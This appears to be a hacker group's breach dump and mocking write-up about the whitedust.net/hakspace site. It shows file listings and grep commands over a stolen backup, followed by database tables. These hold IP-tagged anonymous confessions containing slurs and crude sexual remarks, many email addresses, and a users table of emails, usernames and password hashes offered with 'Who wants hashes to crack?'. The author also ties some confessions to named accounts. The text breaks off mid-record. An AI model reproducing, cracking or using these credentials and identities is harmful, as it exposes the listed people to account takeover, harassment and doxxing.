hakspace-feed.php lastRSS.php search.php Mail admin_listnews.php data_headline.thtml helloworld.php mckinnon section.php Mail.php admin_listpages.php data_news.thtml images modaddnews.php security PEAR.php admin_poll.php data_referers.txt inc-conf.php modapprovecomment.php send.php admin_bin.php admin_rssfeeds.php data_rsslist.txt inc-db.php modccount.php submit.php admin_comingsoon.php admin_sections.php data_scrapbook.txt inc-footer.php new.php survey.php admin_createad.php admin_survey.php data_template_newsletter.htm inc-footer.thtml newpollvote.php text admin_createnews.php admin_todo.php data_todo.txt inc-header.php newsletter_click.php view.php admin_createpage.php admin_viewuser.php data_yesterdaysnews.thtml inc-header.thtml newsview.php whitedust-articles.rss admin_createsection.php advancedsearch.php editorial.php inc-library.php openwysiwyg whitedust-comments.rss admin_cronjob.php advancedsearchresults.php editorial.png include pollview.php admin_editnews.php archives.php filter.php index-paging.php popup.html 0day! Let's check it out! $ grep 0day backup20070717/0day.php $ grep gen_0day backup20070717/* 0day.php: inc-conf.php:function gen_0daylistlong () { inc-conf.php:function gen_0daylist () { index.php: $ grep zeroday backup20070717/inc-conf.php if ($rs = $rss->get('http://research.eeye.com/rss/zeroday.rss')) { if ($rs = $rss->get('http://research.eeye.com/rss/zeroday.rss')) { Ok, so maybe it isn't real 0day. But let's keep looking, I'm sure there is something interesting around. $ ls security/ cgi-bin Still no security. $ cat backup20070717/helloworld.php $ ls backup20070717/forums/ cgi-bin $ ls backup20070717/forums_old/ cgi-bin index.php $ cat backup20070717/forums_old/index.php

Whitedust Forums

Thank God Cronus lacked the skills to write his own forum! In case one wanted to know, there was 28MB of session data from the backup directories. I suppose the Whitedust folks thought it was important to keep that information. O hai! db time! The WD db is fat. Babe Ruth fat. As you can guess, it is bloody full of everything ever produced on whitedust.net. Which just isn't cool. Not only that, but they have spam in their db. Lots of it. Please clean the porn spam out, for the next guy who wants to go through this. We can still find some fun for you. -- Dumping data for table `wd3_confessions` -- INSERT INTO `wd3_confessions` VALUES (1, 'I forget my passwords all the time. I am mentally retarded.', 2, '86.128.242.50'); INSERT INTO `wd3_confessions` VALUES (2, 'Once, I sparked a brand new mobo with a screw driver because I left it on while I was overclocking it. Tha t was pretty dumb.', 2, '86.128.242.50'); INSERT INTO `wd3_confessions` VALUES (3, 'A few years back, while installing a beta of Win2K, I decided to re-partition the wrong hard drive and wip ed out my main Linux install instead of the junk partitions on the drive I meant to use. Didn\\''t lose anything of particular value, but plenty of files that I\\''d like to still have.', 2, '86.128.242.50'); INSERT INTO `wd3_confessions` VALUES (4, 'Many years ago, we had a cluster of vaxen connected by this new-fangled thin-wire ethernet. On one occasio n I managed to catch my foot in a dangling cable and pull a plug out. The whole cluster came to a juddering halt and everything had to be rebooted ( apparently vax clusters are very intolerant of broken connections).', 2, '86.128.242.50'); INSERT INTO `wd3_confessions` VALUES (5, 'I Left a Win NT server running on some old scsi drives stay on for an entire summer without supervision. I \\''m not entirely sure why the drive didn\\''t power down, but when we came back there was a hole blown through one side of the drive and all of th e platters were ground to a fine magnetic dust.', 2, '86.128.242.50'); INSERT INTO `wd3_confessions` VALUES (6, 'I beat off to an image of Mark Hinge.', 0, '69.149.55.127'); INSERT INTO `wd3_confessions` VALUES (7, 'Once while browsing my schools database. Some idiot copied the entire schools SSN\\''s and other sensitiv e data into a public folder. I sold ever last byte of data. ', 0, '207.62.142.90'); INSERT INTO `wd3_confessions` VALUES (8, 'I eat cat...no seriously nigga, I do. It\\''s good as fuck too. Try that shit!', 0, '71.41.119.106'); INSERT INTO `wd3_confessions` VALUES (9, 'Hackers is the best movie ever.', 0, '75.45.93.66'); INSERT INTO `wd3_confessions` VALUES (10, 'Mark is really a lady, which is why he loves men so much', 0, '195.153.0.146'); INSERT INTO `wd3_confessions` VALUES (11, 'I hate myself.', 0, '15.235.153.105'); INSERT INTO `wd3_confessions` VALUES (18, 'I once hacked my localhost without realizing it was my own comp.', 0, '85.227.190.206'); INSERT INTO `wd3_confessions` VALUES (17, 'If I had a penny for every stupid coding mistake I\\''ve made, I\\''d have a penny.', 0, '89.125.72.46'); INSERT INTO `wd3_confessions` VALUES (14, 'I, on occasion, hacketh on Sunday.', 0, '129.169.173.159'); INSERT INTO `wd3_confessions` VALUES (15, 'Hakspace now knows how to prevent against \\"simple xss\\" :P', 2, '86.128.245.103'); INSERT INTO `wd3_confessions` VALUES (16, 'I forgot about xss when throwing this confessional together... Opps.', 0, '89.125.72.46'); INSERT INTO `wd3_confessions` VALUES (19, 'I put porn on my catholic high schools web page. It was glorious!', 0, '207.62.142.90'); INSERT INTO `wd3_confessions` VALUES (20, 'printed off the pwd list in clear txt, left it on the printer. goamin jebus, cant u get a bros back, we a ll know u were english', 0, '80.6.1.228'); INSERT INTO `wd3_confessions` VALUES (21, 'Kevin Mitnick is a narc', 0, '213.132.44.209'); INSERT INTO `wd3_confessions` VALUES (22, 'I forget his passwords all the time, I am mentally retarded\r\n', 0, '70.181.60.235'); INSERT INTO `wd3_confessions` VALUES (23, 'I sucked off Mark Hinge for an invite to Hakspace.', 23, '208.29.186.54'); INSERT INTO `wd3_confessions` VALUES (24, 'I\\''m a psychopathic sadist. Nothing turns me on like fear and panic and raw terror in a girl\\''s eyes. ', 0, '64.184.139.50'); INSERT INTO `wd3_confessions` VALUES (25, 'Mark Hinge is the secret identity of the superhero Electric Warrior.', 0, '64.184.139.50'); INSERT INTO `wd3_confessions` VALUES (26, 'I have dreams where I can fly and make people explode. In one of my past lives I must have been a fighter plane.', 0, '64.184.139.50'); INSERT INTO `wd3_confessions` VALUES (27, 'Looking at PERL makes me fly into a violent rage and crush people with steamrollers', 0, '64.184.139.50') ; INSERT INTO `wd3_confessions` VALUES (28, 'i still cant figure out how to shot web', 0, '64.184.139.50'); INSERT INTO `wd3_confessions` VALUES (29, 'Once, back in the early years of the WWW, I had this win3.11 486 with a compressed hard drive. I was not satisfied with how small the hard drive was, so in an effort to free up more space I deleted the compression file on H:. It did indeed free up disk space. I cried. \r\nTrue Fact!', 0, '64.184.139.50'); INSERT INTO `wd3_confessions` VALUES (30, 'i\\''m in love with a fictional character and feel so ashamed and stupid but i can\\''t help it', 0, '64. 184.139.50'); INSERT INTO `wd3_confessions` VALUES (31, 'I never follow through on my promises to do things for people.', 0, '64.184.139.50'); INSERT INTO `wd3_confessions` VALUES (32, 'I found the \\"mental retard\\"\\''s passwords and changed them all :)', 0, '64.184.139.50'); INSERT INTO `wd3_confessions` VALUES (33, 'It took me three days to mount a USB drive on slackware :(', 0, '86.128.245.103'); INSERT INTO `wd3_confessions` VALUES (34, 'I am not in love with a fictional character but I still really want to bang Scarlet Johanson.', 2, '86.12 8.245.103'); INSERT INTO `wd3_confessions` VALUES (35, 'I did both my ex\\''s best friends. That\\''ll teach her.', 2, '86.128.245.103'); INSERT INTO `wd3_confessions` VALUES (36, 'I watched most of mad max three yesterday jsut so i could hear HERO by tina turner in that context... and they fucking cut it. That\\''s the definition of disappointing.', 2, '86.128.245.103'); INSERT INTO `wd3_confessions` VALUES (37, 'I pissed in the iced tea while working at McDonalds.', 0, '208.135.167.58'); INSERT INTO `wd3_confessions` VALUES (38, 'I pissed in the iced tea while working at McDonalds.', 0, '208.135.167.58'); INSERT INTO `wd3_confessions` VALUES (39, 'Kevin Mitnick has more money than God. And he\\''s not God.', 0, '86.128.245.103'); INSERT INTO `wd3_confessions` VALUES (40, 'Once I stole someone\\''s mouseball at work.', 0, '71.217.127.25'); INSERT INTO `wd3_confessions` VALUES (41, 'I\\''ve finally paid off my computer. It\\''s been 2 years of monthly payments, 2 years of joy, sadness, porn, ridiculous mailing friends, a 39 year old woman stalking me over the msn after being humped and choked, oh boy, that woman could suck. She\\'' s dismissed by this controllable beast for a keyboard, click. Oh gosh, times are changing, credits are being washed away, only 239 Swedish crowns to go, it\\''s amazing how the internet can keep you amused for 40$ a month, it\\''s a fuckin\\'' devil\\''s bargain. \r\n\r\nThey tell me that the in ternet should be free of charge, it is, just think of all the pussies you can get over the net for 40$. A short introduction of yourself, a picture of your cock and you\\''re all set. You can\\''t even get a blowjob from a prostitute on the streets for that price, so yeah, the internet is alread y free of charge. All the things I\\''ve ordered with this digital masterpiece, oh boy, it\\''s countless. And the best part... it\\''s all mine now .\r\n\r\n', 0, '81.236.159.119'); INSERT INTO `wd3_confessions` VALUES (42, 'I still smell blooommuhs and plagiarize Lenny Bruce;maybe if I got my head outa my pants?', 0, '64.114.17 5.220'); INSERT INTO `wd3_confessions` VALUES (43, 'every single program on my pc is pirated... im a budget guy', 31, '86.140.164.35'); INSERT INTO `wd3_confessions` VALUES (44, 'dead girls dont say no ;)', 31, '86.140.164.35'); Most are anonymous but a few are interesting: INSERT INTO `wd3_confessions` VALUES (15, 'Hakspace now knows how to prevent against \\"simple xss\\" :P', 2, '86.128.245.103'); # good work psg! now onto sql injection! INSERT INTO `wd3_confessions` VALUES (23, 'I sucked off Mark Hinge for an invite to Hakspace.', 23, '208.29.186.54'); # 'Nox_Deveraux@hotmail.com', 'vioxis' INSERT INTO `wd3_confessions` VALUES (35, 'I did both my ex\\''s best friends. That\\''ll teach her.', 2, '86.128.245.103'); # naughty psg! Is your current girlfriend one of them? INSERT INTO `wd3_confessions` VALUES (44, 'dead girls dont say no ;)', 31, '86.140.164.35'); # 31, 'jswray@hotmail.com', 'Hellz UK' -- Dumping data for table `wd3_invites` -- INSERT INTO `wd3_invites` VALUES (1, 'mark.anderson@whitedust.net', 0, 1); INSERT INTO `wd3_invites` VALUES (2, 'mark.hinge@whitedust.net', 0, 1); INSERT INTO `wd3_invites` VALUES (7, 'jake.black@whitedust.net', 1, 1); INSERT INTO `wd3_invites` VALUES (6, 'jake.black@whitedust.net', 1, 1); ^^^^^ super important double invite INSERT INTO `wd3_invites` VALUES (8, 'retro@whitedust.net', 2, 1); INSERT INTO `wd3_invites` VALUES (9, 'liamshee@hushmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (10, 'info@mellow.ie', 1, 1); INSERT INTO `wd3_invites` VALUES (11, 'info@mellow.ie', 1, 1); ^^^^^ omg-bak quadrouple invite! INSERT INTO `wd3_invites` VALUES (12, 'info@mellow.ie', 1, 1); INSERT INTO `wd3_invites` VALUES (13, 'info@mellow.ie', 1, 1); INSERT INTO `wd3_invites` VALUES (14, 'voshika@hakspace.net', 2, 1); INSERT INTO `wd3_invites` VALUES (15, 'whitedust@hakspace.net', 2, 1); INSERT INTO `wd3_invites` VALUES (16, 'hakspace@hakspace.net', 2, 1); INSERT INTO `wd3_invites` VALUES (17, 'zachary.ehnerd@whitedust.net', 2, 1); INSERT INTO `wd3_invites` VALUES (18, 'peter.prickett@whitedust.net', 2, 1); INSERT INTO `wd3_invites` VALUES (19, 'Oracle.GreenDiamond@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (20, 'prgmmstr@hotmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (21, 'l0gic@l0gic.net', 2, 0); INSERT INTO `wd3_invites` VALUES (22, 'kussic@mac.com', 2, 1); INSERT INTO `wd3_invites` VALUES (23, 'talonprime@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (24, 'webmaster@cultdeadcow.com', 2, 0); INSERT INTO `wd3_invites` VALUES (25, 'kyrill.poole@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (26, 'Nox_Deveraux@hotmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (27, 'ganesh.devarajan@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (28, 'mark.collins@westgateit.com', 2, 1); INSERT INTO `wd3_invites` VALUES (29, 'robohara@robohara.com', 2, 1); INSERT INTO `wd3_invites` VALUES (30, 'joe@cotch.net', 2, 0); INSERT INTO `wd3_invites` VALUES (31, 'myles@cultdeadcow.com', 2, 0); INSERT INTO `wd3_invites` VALUES (32, 'adi.zerok@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (33, 'dancho.danchev@hush.com', 2, 0); INSERT INTO `wd3_invites` VALUES (34, 'rdx@chemist.com', 2, 1); INSERT INTO `wd3_invites` VALUES (35, 'tetsuharu@gmail.com', 14, 1); INSERT INTO `wd3_invites` VALUES (36, 'adrian.daly@whitedust.net', 2, 0); INSERT INTO `wd3_invites` VALUES (37, ' phantom1984@mail.gr', 14, 1); INSERT INTO `wd3_invites` VALUES (38, 'itek.etx@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (39, 'crazyferk@hotmail.com', 2, 0); INSERT INTO `wd3_invites` VALUES (40, 'mukkanythio@hotmail.com', 2, 0); INSERT INTO `wd3_invites` VALUES (41, 'todreamofautumn@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (42, 'christopher.hogg@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (43, 'screv@hotmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (44, 'zaphodb777@gmail.com', 2, 0); INSERT INTO `wd3_invites` VALUES (45, 'naxxtor@hackervoice.co.uk', 2, 0); ^^^^^ lawl noob INSERT INTO `wd3_invites` VALUES (46, 'peter.prickett@whitedust.net', 2, 1); INSERT INTO `wd3_invites` VALUES (47, 'peter.prickett@hotmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (48, 'mukkanyhtio@hotmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (49, 'jswray@hotmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (50, 'punkle.jones@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (51, 'carlysmith@hotmail.com', 2, 0); INSERT INTO `wd3_invites` VALUES (52, 'trammel@cdc-nsf.com', 2, 1); INSERT INTO `wd3_invites` VALUES (53, 'chunky_lover785@msn.com', 14, 1); INSERT INTO `wd3_invites` VALUES (54, 'wajkas@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (55, 'webmistress@rqporn.com', 14, 0); INSERT INTO `wd3_invites` VALUES (56, 'necromancer.rob@gmail.com', 23, 1); INSERT INTO `wd3_invites` VALUES (57, 'n00dles@neocyber.info', 2, 0); INSERT INTO `wd3_invites` VALUES (58, 'kuza55@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (59, 'quorbeau@gmail.com', 2, 1); INSERT INTO `wd3_invites` VALUES (60, 'alistair.lamont@gmail.com', 2, 1); INSERT INTO `wd3_profiles` VALUES (6, 8, 'Voshika', 'The voice from the dark.', 'You don\\''t know me. But I\\''ve always been here.', 'Many.', 'Man y.', 'voshika [at] hakspace.net', 'http://www.hakspace.net/avatarimages/voshika.jpg', '/home/markande/domains/hakspace.net/public_html/avatarimages/ voshika.jpg', ''); We know you. You're that goatraper psg. -- Dumping data for table `wd3_rssfeeds` -- INSERT INTO `wd3_rssfeeds` VALUES (1, '', 'http://www.techdirt.com/techdirt_rss.xml'); INSERT INTO `wd3_rssfeeds` VALUES (2, '', 'http://slashdot.org/slashdot.xml'); INSERT INTO `wd3_rssfeeds` VALUES (3, '', 'http://news.bbc.co.uk/rss/newsonline_uk_edition/technology/rss.xml'); INSERT INTO `wd3_rssfeeds` VALUES (4, '', 'http://www.theregister.co.uk/headlines.rss'); INSERT INTO `wd3_rssfeeds` VALUES (5, '', 'http://www.moreover.com/cgi-local/page?feed=129&o=rss'); INSERT INTO `wd3_rssfeeds` VALUES (6, '', 'http://msdn.microsoft.com/security/rss.xml'); INSERT INTO `wd3_rssfeeds` VALUES (7, '', 'http://www.networkcomputing.com/rss/rss-security.jhtml'); INSERT INTO `wd3_rssfeeds` VALUES (8, '', 'http://www.networkworld.com/rss/security.xml'); INSERT INTO `wd3_rssfeeds` VALUES (9, '', 'http://www.topix.net/rss/tech/computer-security.xml'); INSERT INTO `wd3_rssfeeds` VALUES (10, '', 'http://feeds.feedburner.com/zdnetuk/security'); INSERT INTO `wd3_rssfeeds` VALUES (11, '', 'http://feeds.computerworld.com/Computerworld/Hacking/News'); INSERT INTO `wd3_rssfeeds` VALUES (12, '', 'http://feeds.computerworld.com/Computerworld/Security/News'); INSERT INTO `wd3_rssfeeds` VALUES (13, '', 'http://feeds.computerworld.com/Computerworld/Security/Holes/News'); INSERT INTO `wd3_rssfeeds` VALUES (14, '', 'http://feeds.computerworld.com/Computerworld/Worms/News'); INSERT INTO `wd3_rssfeeds` VALUES (15, '', 'http://feeds.computerworld.com/Computerworld/Macintosh/News'); INSERT INTO `wd3_rssfeeds` VALUES (16, '', 'http://www.neworder.box.sk/xml.php'); INSERT INTO `wd3_rssfeeds` VALUES (17, '', 'http://rtfm.spaces.live.com/feed.rss'); INSERT INTO `wd3_rssfeeds` VALUES (18, '', 'http://www.frsirt.com/exploits.xml'); INSERT INTO `wd3_rssfeeds` VALUES (19, '', 'http://www.securitypark.co.uk/rss/rss.asp'); INSERT INTO `wd3_rssfeeds` VALUES (20, '', 'http://rss.windowsecurity.com/allnews.xml'); INSERT INTO `wd3_rssfeeds` VALUES (21, '', 'http://secunia.com/information_partner/anonymous/o.rss'); INSERT INTO `wd3_rssfeeds` VALUES (22, '', 'http://populicio.us/newlinks.rss'); INSERT INTO `wd3_rssfeeds` VALUES (23, '', 'http://digg.com/rss/indexsecuritydig.xml'); INSERT INTO `wd3_rssfeeds` VALUES (24, '', 'http://www.cultdeadcow.com/cms/index.xml'); INSERT INTO `wd3_rssfeeds` VALUES (25, '', 'http://www.whitedust.net/articles.rss'); INSERT INTO `wd3_rssfeeds` VALUES (26, '', 'http://research.eeye.com/rss/zeroday.rss'); INSERT INTO `wd3_rssfeeds` VALUES (27, '', 'http://www.lockdown.co.uk/wp-rss2.php'); INSERT INTO `wd3_rssfeeds` VALUES (28, '', 'http://www.gamesradar.com/us/rss/game_news_feed.jsp'); INSERT INTO `wd3_rssfeeds` VALUES (29, '', 'http://rss.slashdot.org/Slashdot/slashdotGames'); INSERT INTO `wd3_rssfeeds` VALUES (30, '', 'http://darkzero.co.uk/cms/rss.php?section=Gaming'); INSERT INTO `wd3_rssfeeds` VALUES (31, '', 'http://feeds.wired.com/wired/culture/joystick'); INSERT INTO `wd3_rssfeeds` VALUES (32, '', 'http://www.gamesindustry.biz/rss/gamesindustry_news_feed.rss'); INSERT INTO `wd3_rssfeeds` VALUES (33, '', 'http://feeds.joystiq.com/weblogsinc/joystiq'); INSERT INTO `wd3_rssfeeds` VALUES (34, '', 'http://feeds.feedburner.com/2old2play'); INSERT INTO `wd3_rssfeeds` VALUES (35, '', 'http://digg.com/rss/containergaming.xml'); INSERT INTO `wd3_rssfeeds` VALUES (36, '', 'http://www.computerandvideogames.com/rss/feed.php?priority=1&limit=100'); INSERT INTO `wd3_rssfeeds` VALUES (37, '', 'http://scripts.ign.com/rss/ign.all.2.0.xml'); INSERT INTO `wd3_rssfeeds` VALUES (38, '', 'http://www.eurogamer.net/rss/eurogamer_frontpage_feed.rss'); INSERT INTO `wd3_rssfeeds` VALUES (39, '', 'http://www.linux-gamers.net/backend.php'); INSERT INTO `wd3_rssfeeds` VALUES (40, '', 'http://www.gamedaily.com/feeds/content/rss/biz_news.xml'); INSERT INTO `wd3_rssfeeds` VALUES (41, '', 'http://www.gamedaily.com/feeds/content/rss/biz_features.xml'); INSERT INTO `wd3_rssfeeds` VALUES (42, '', 'http://www.gamedaily.com/feeds/content/rss/biz_interviews.xml'); INSERT INTO `wd3_rssfeeds` VALUES (43, '', 'http://www.gamedaily.com/feeds/content/rss/biz_myturn.xml'); INSERT INTO `wd3_rssfeeds` VALUES (44, '', 'http://www.gamedaily.com/feeds/content/rss/biz_media.xml'); INSERT INTO `wd3_rssfeeds` VALUES (45, '', 'http://www.gamedaily.com/feeds/content/rss/biz_adwatch.xml'); INSERT INTO `wd3_rssfeeds` VALUES (46, '', 'http://www.gamedaily.com/feeds/content/rss/biz_toppers.xml'); INSERT INTO `wd3_rssfeeds` VALUES (47, '', 'http://www.gamedaily.com/feeds/content/rss/biz_movers.xml'); INSERT INTO `wd3_rssfeeds` VALUES (48, '', 'http://www.offensivecomputing.net/?q=node/feed'); INSERT INTO `wd3_rssfeeds` VALUES (49, '', 'http://feeds.feedburner.com/darknethackers'); INSERT INTO `wd3_rssfeeds` VALUES (50, '', 'http://www.milw0rm.com/rss.php'); INSERT INTO `wd3_rssfeeds` VALUES (51, '', 'http://www.spacerogue.net/wordpress/?feed=rss2'); INSERT INTO `wd3_rssfeeds` VALUES (52, '', 'http://www.hackwire.com/modules.php?modname=backend&action=rdf'); INSERT INTO `wd3_rssfeeds` VALUES (53, '', 'http://bbs.progenic.com/RssFeed32-0-0-1.aspx'); INSERT INTO `wd3_rssfeeds` VALUES (54, '', 'http://www.2600.com/rss.xml'); INSERT INTO `wd3_rssfeeds` VALUES (55, '', 'http://www.viruslist.com/en/rss/latestnews'); INSERT INTO `wd3_rssfeeds` VALUES (56, '', 'http://www.thc.org/rss.xml.php'); INSERT INTO `wd3_rssfeeds` VALUES (57, '', 'http://www.virusbtn.com/feeds/virus_news.rdf'); INSERT INTO `wd3_rssfeeds` VALUES (58, '', 'http://www.darkreading.com/rss_simple.asp?f_s=296&f_ln=Dark+Reading+News+ Analysis'); INSERT INTO `wd3_rssfeeds` VALUES (59, '', 'http://www.defcon.org/defconrss.xml'); INSERT INTO `wd3_rssfeeds` VALUES (60, '', 'http://www.greekhackers.gr/rss.php?cat_id=12'); INSERT INTO `wd3_rssfeeds` VALUES (61, '', 'http://www.mantisbt.org/bugs/issues_rss.php?'); INSERT INTO `wd3_rssfeeds` VALUES (62, '', 'http://www.i-hacked.com/component/option,com_rss/feed,RSS0.91/no_html,1/' ); Again, only the most elite and accurate websites are used for information gathering. In case you were wondering, that empty second field is "Name". Who wants hashes to crack? INSERT INTO `wd3_users` VALUES (1, 'mark.anderson@whitedust.net', 'cronus', 'd519e62be0c9632870a3dd34f5f193cd', '6d401951bb8c76682f79df0ba253f531', 1, 1, '83-71-12-6.b-ras1.dbn.dublin.eircom.net', 'Thu, 02 Aug 2007 16:03:25 +0100'); INSERT INTO `wd3_users` VALUES (2, 'mark.hinge@whitedust.net', 'psg', '2e6775fe7657fdac368f11a98e0a74c1', '5c64a9c224eb17aee23c82d44bf7c9f3', 1, 1, 'host86-152-13-153.range86-152.btcentralplus.com', 'Fri, 03 Aug 2007 01:10:05 +0100'); INSERT INTO `wd3_users` VALUES (4, 'jake.black@whitedust.net', 'jake', '2b19bb9fc912317039ace2031505b625', '87fea60da86d4262c2c20561cef903e0', 0, 1, '83-71-10-237.b-ras1.', 'Mon, 02 Jul 2007 02:53:37 +010'); INSERT INTO `wd3_users` VALUES (7, 'info@mellow.ie', 'mellowchris', 'a269d17349ce29a77a89c7ec4ed0c3d4', '84fdbab4eb24844c4bded8579217a8ba', 0, 1, '8 3-71-12-6.b-ras1.dbn.dublin.eircom.net', 'Thu, 12 Jul 2007 03:47:45 +0100'); INSERT INTO `wd3_users` VALUES (5, 'retro@hakspace.net', 'retro', 'e0a0d4162d56990708c1830e1683ed70', 'f96d966955379c65b28f94570f358410', 0, 1, 'hos t86-128-45-114.range86-128.btcentralp', 'Tue, 17 Jul 2007 16:00:24 +0100'); INSERT INTO `wd3_users` VALUES (6, 'liamshee@hushmail.com', 'liamshee', '187c9c16abffd86e11242405433d849f', 'a5f0b5800a8d4bb7254f24f3860a67fa', 0, 1 , 'host86-128-233-133.range86-128.btcentral', 'Tue, 10 Jul 2007 03:00:16 +0100'); INSERT INTO `wd3_users` VALUES (8, 'voshika@hakspace.net', 'voshika', 'e5271d126841229f857adbf4bc5c9db7', '1100059027b26be1b10d6d64357184c0', 0, 1, 'host86-128-233-133.range86-128.btcentral', 'Thu, 12 Jul 2007 16:13:41 +0100'); INSERT INTO `wd3_users` VALUES (9, 'whitedust@hakspace.net', 'Whitedust', 'e5271d126841229f857adbf4bc5c9db7', '7b43cd9195cfc4661b0ea9932e3c2189', 0, 1, 'host86-128-234-65.range86-128.btcentralp', 'Thu, 12 Jul 2007 17:22:10 +0100'); INSERT INTO `wd3_users` VALUES (10, 'hakspace@hakspace.net', 'hakspace', 'e5271d126841229f857adbf4bc5c9db7', '3fd50767862786f59bd99371c314ea39', 0, 1, 'host86-128-234-65.range86-128.btcentralp', 'Thu, 12 Jul 2007 19:19:47 +0100'); INSERT INTO `wd3_users` VALUES (11, 'zachary.ehnerd@whitedust.net', 'ComradeSmack', '4d86b29292a7402d5b3f71343047214b', 'b015749926916024a1d54daec6f d022e', 1, 1, 'gw.taylorcreek.net', 'Thu, 26 Jul 2007 18:18:26 +0100'); INSERT INTO `wd3_users` VALUES (12, 'adi.zerok@gmail.com', 'Aditya_KS', 'ad7995f8341feebed0ad8725de84f588', 'bd7ace6c2946490bb9be9eeba52e0881', 0, 1 , 'unknown', 'Sun, 29 Jul 2007 13:30:49 +0100'); INSERT INTO `wd3_users` VALUES (13, 'kyrill.poole@gmail.com', 'morts', '87421107f3614c98c5bdc82aa1404956', '73d2bbcc0ea0a9d462982e4823725410', 0, 1, '80-193-38-51.cable.ubr05.hari.blueyonder.co.uk', 'Wed, 25 Jul 2007 22:00:26 +0100'); INSERT INTO `wd3_users` VALUES (14, 'Oracle.GreenDiamond@gmail.com', 'Oracle GreenDiamond', 'e61e3ea9fe90b504c95f65bfcfb4c238', '3f8c86af14cbf6f55a0 bee274ee4fd32', 0, 1, 'adsl-69-149-39-229.dsl.rcsntx.swbell.net', 'Mon, 23 Jul 2007 12:36:05 +0100'); INSERT INTO `wd3_users` VALUES (15, 'talonprime@gmail.com', 'tprime', '8b65996657feab900109f216f4b951b6', '18af855ff840c8cf5ca7c1999fddf055', 0, 1, 'adsl-75-45-93-66.dsl.sfldmi.sbcglobal.ne', 'Wed, 18 Jul 2007 19:32:47 +0100'); INSERT INTO `wd3_users` VALUES (16, 'mark.collins@westgateit.com', 'Nurgle', '73a6fcb016535503154cecf09b787015', 'ae1c721022955c92c9041bea5455f7b7', 0, 1, '82.109.255.212', 'Wed, 18 Jul 2007 08:47:27 +0100'); INSERT INTO `wd3_users` VALUES (17, 'tetsuharu@gmail.com', 'Tetsuharu', 'c1f51b71d7bde16cecc0fc72261d029f', 'c4b2b1d5077c5f58c0c5eebd50f33a1b', 0, 1 , '48.81.33.65.cfl.res.rr.com', 'Wed, 18 Jul 2007 10:09:49 +0100'); INSERT INTO `wd3_users` VALUES (18, ' phantom1984@mail.gr', 'Dr_Brain', 'ca507447d11585985bfdd414fb3ea852', 'daa5e6c82cd13b861e6caaa253455892', 0, 1 , 'ppp140-071.dsl.hol.gr', 'Thu, 19 Jul 2007 13:02:52 +0100'); INSERT INTO `wd3_users` VALUES (19, 'prgmmstr@hotmail.com', 'mubix', '1c87b47a691915447b56e9b84a9b6604', '82810223ef6c28001c12aa6fef3799d5', 0, 1, ' c-71-62-129-120.hsd1.va.comcast.net', 'Wed, 01 Aug 2007 11:35:31 +0100'); INSERT INTO `wd3_users` VALUES (20, 'kussic@mac.com', 'Kussic', '72004baeee8546c67a47cd8e394bcc04', '02512c236fbdb221e30f921fe9782d84', 0, 1, '82.13 3.27.16', 'Thu, 19 Jul 2007 14:13:15 +0100'); INSERT INTO `wd3_users` VALUES (21, 'robohara@robohara.com', 'Flack', '90a0601580134d67ce16bb82c16d2214', '06424d5bae95b52387d0393895cd8b57', 0, 1, 'ip72-192-103-188.ok.ok.cox.net', 'Tue, 24 Jul 2007 01:37:29 +0100'); INSERT INTO `wd3_users` VALUES (22, 'ganesh.devarajan@gmail.com', '64n35h', 'c0810fdb65d4d3b3461c869bc90e6b10', '919890bb648b9ab434b001ac085a3893', 0, 1, 'cpe-70-112-202-108.austin.res.rr.com', 'Wed, 18 Jul 2007 13:08:17 +0100'); INSERT INTO `wd3_users` VALUES (23, 'Nox_Deveraux@hotmail.com', 'vioxis', '0da2e7fa0ba90f4ae031b0d232b8a57a', '0dd98cc3556dba409cc1d2258516ac8a', 0, 1, '208.29.184.11', 'Sat, 28 Jul 2007 20:16:29 +0100'); INSERT INTO `wd3_users` VALUES (24, 'itek.etx@gmail.com', 'lady_mars', '5ce75b5b9319d36542ee0d1d494bf621', '13138e07f8891fc8afb1c64850ccefb2', 0, 1, '12.5.189.75', 'Mon, 23 Jul 2007 01:53:27 +0100'); INSERT INTO `wd3_users` VALUES (25, 'christopher.hogg@gmail.com', 'cj', 'b4848d476a1040784bb82509af540e38', 'fb14962c5efc961014879d2f78e8ae53', 0, 1 , 'mail.btl.fki-eng.com', 'Tue, 31 Jul 2007 07:50:50 +0100'); INSERT INTO `wd3_users` VALUES (26, 'peter.prickett@whitedust.net', 'chickensoup', 'dd22141acb5ea065acd5ed773729c98f', 'dfdb395b1ab1d8fc5c8293776067 13d7', 0, 1, 'host86-132-153-90.range86-132.btcentralp', 'Sun, 22 Jul 2007 21:18:16 +0100'); INSERT INTO `wd3_users` VALUES (27, 'mukkanyhtio@hotmail.com', 'LiX', 'bb358eb6ff2cc1090440672054575989', '0b84dd49a63297d7dd200afe4d32dffa', 0, 1, 'host81-132-154-93.range81-132.btcentralp', 'Fri, 20 Jul 2007 21:32:33 +0100'); INSERT INTO `wd3_users` VALUES (28, 'punkle.jones@gmail.com', 'Punkle Jones', '87515c72861add9379aa60a08016c21a', '0473fa091f52c806b8c7b3a71f084729' , 0, 1, 'ppp-70-250-245-58.dsl.okcyok.swbell.net', 'Sat, 28 Jul 2007 14:41:58 +0100'); INSERT INTO `wd3_users` VALUES (29, 'screv@hotmail.com', 'screv', '4aaad5269c580a6afd8333d73e417b5e', '05add5fc85480184193373e93967d002', 0, 1, '', ''); INSERT INTO `wd3_users` VALUES (30, 'todreamofautumn@gmail.com', 'xjessicax', 'ddd956c117486cba6efef9fcc4c38549', 'da04e14d4c039662bc38819516f919f8' , 0, 1, 'adsl-68-77-83-243.dsl.ipltin.ameritech.n', 'Sat, 21 Jul 2007 17:35:16 +0100'); INSERT INTO 